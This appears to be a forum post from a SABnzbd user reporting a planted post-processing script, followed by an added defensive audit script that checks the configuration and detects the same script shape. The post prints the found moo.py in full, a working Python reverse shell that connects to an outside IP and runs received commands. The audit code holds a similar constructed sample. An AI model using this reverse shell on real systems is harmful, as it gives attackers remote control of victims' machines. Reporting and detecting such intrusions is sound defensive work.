After looking at my successfully downloaded files I noticed the following directories: fu and fu.1 in the downloads area.
Both contained a script called moo.py.
In the SABnzbd settings this directory was set as the user post-processing script directory (not by me).
Both files are owned by the user sabnzbd (limited rights).
I am running SABnzbd 0.7.20 on a Linux server.
The contents of the file are:
```python
#!/usr/bin/python
import socket,subprocess

HOST = '18.104.22.168'  # The remote host
PORT = 4430             # The same port as used by the server

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
    # recieve shell command
    data = s.recv(1024)
    # if its quit, then break out and close socket
    if data == "quit":
        break
    # do shell command
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # read output
    stdout_value = proc.stdout.read() + proc.stderr.read()
    # send output to attacker
    s.send(stdout_value)
# close socket
s.close()
```
How do I stop this from happening in the future, especially the part where my SABnzbd configuration was changed by something or someone to set the "fu" directory as the post-processing user script directory?
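The two things the post describes can both be checked mechanically: a script directory that has been pointed into the download area (where the sabnzbd user, and therefore anything that runs as it, can write), and a script in that directory that connects outbound and feeds whatever it receives to a shell. The following audit is an added example and is not code from this thread or from the SABnzbd project. It assumes sabnzbd.ini stores the folders as `download_dir`, `complete_dir` and `script_dir` under `[misc]`; the ini fragment and the two scripts it scans are constructed samples (the hostile one mirrors the shape of the posted moo.py with a documentation IP), so it runs offline.

```python
#!/usr/bin/env python3
"""Audit a SABnzbd install for the tampering described in the post:
a user-script folder pointing into the download area, and a script
there that opens an outbound socket and hands received data to a shell.

Added example, not from the forum thread or from SABnzbd. Assumption:
sabnzbd.ini keeps download_dir, complete_dir and script_dir under [misc].
"""
import ast
import pathlib
import tempfile

# CONSTRUCTED sabnzbd.ini fragment mirroring the post (not the real file).
SAMPLE_INI = """__version__ = 19
[misc]
download_dir = /srv/nzb/incomplete
complete_dir = /srv/nzb/complete
script_dir = /srv/nzb/complete/fu
"""

# CONSTRUCTED scripts for the demo; the hostile one has the shape of the
# posted moo.py (connect out, recv, Popen(shell=True)) with a RFC 5737 IP.
HOSTILE_SCRIPT = """import socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.0.2.10", 4430))
while 1:
    data = s.recv(1024)
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE)
    s.send(proc.stdout.read())
"""
BENIGN_SCRIPT = """import sys
print("finished:", sys.argv[1])
"""

SHELL_FUNCS = {"Popen", "call", "run", "check_output", "check_call"}
NET_FUNCS = {"connect", "connect_ex", "create_connection"}


def parse_misc_folders(ini_text):
    """Minimal [misc] reader. SABnzbd's ini has bare keys above the first
    section header, which configparser rejects, so read it by hand."""
    section, folders = None, {}
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line.strip("[]").lower()
        elif section == "misc" and "=" in line:
            key, _, value = line.partition("=")
            folders[key.strip()] = value.strip().strip('"')
    return folders


def config_findings(ini_text):
    """Flag a script_dir that sits inside a folder SABnzbd itself writes to:
    anything that can drop files there can also drop a post-processing script."""
    f = parse_misc_folders(ini_text)
    script_dir = pathlib.PurePosixPath(f.get("script_dir", ""))
    findings = []
    for key in ("download_dir", "complete_dir"):
        if not f.get(key):
            continue
        base = pathlib.PurePosixPath(f[key])
        if script_dir == base or base in script_dir.parents:
            findings.append(f"script_dir {script_dir} is inside {key} {base}")
    return findings


def _call_name(node):
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else ""


def script_indicators(source):
    """Walk the AST and return why a post-processing script looks hostile:
    'outbound_socket' for connect()-style calls, 'shell_exec' for os.system
    or a subprocess call with shell=True, 'unparseable' on syntax errors
    (a file the auditor cannot read still deserves a look)."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return {"unparseable"}
    found = set()
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in NET_FUNCS:
            found.add("outbound_socket")
        shell_true = any(kw.arg == "shell" and isinstance(kw.value, ast.Constant)
                         and kw.value.value is True for kw in node.keywords)
        if name == "system" or (name in SHELL_FUNCS and shell_true):
            found.add("shell_exec")
    return found


def audit_script_dir(script_dir):
    """Scan every *.py in script_dir; report files that show both an outbound
    connection and shell execution (the reverse-shell pair) or cannot be parsed."""
    report = {}
    for path in sorted(pathlib.Path(script_dir).glob("*.py")):
        ind = script_indicators(path.read_text(errors="replace"))
        if {"outbound_socket", "shell_exec"} <= ind or "unparseable" in ind:
            report[path.name] = sorted(ind)
    return report


def demo():
    """Build the constructed scenario in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        (pathlib.Path(tmp) / "moo.py").write_text(HOSTILE_SCRIPT)
        (pathlib.Path(tmp) / "notify.py").write_text(BENIGN_SCRIPT)
        return config_findings(SAMPLE_INI), audit_script_dir(tmp)


if __name__ == "__main__":
    cfg, scripts = demo()
    for line in cfg:
        print("config:", line)
    for name, why in scripts.items():
        print("script:", name, why)
```

On a real install, point `config_findings` at the text of sabnzbd.ini and `audit_script_dir` at the configured folder; the intended end state is a script directory outside every folder the sabnzbd user can write to, owned by root, with only scripts you placed there. The AST walk is a signature for this one script shape, not a general malware detector: an attacker who uses `exec` on an encoded blob or a non-Python script will not trip it, so treat a clean report as "nothing obvious", not as proof.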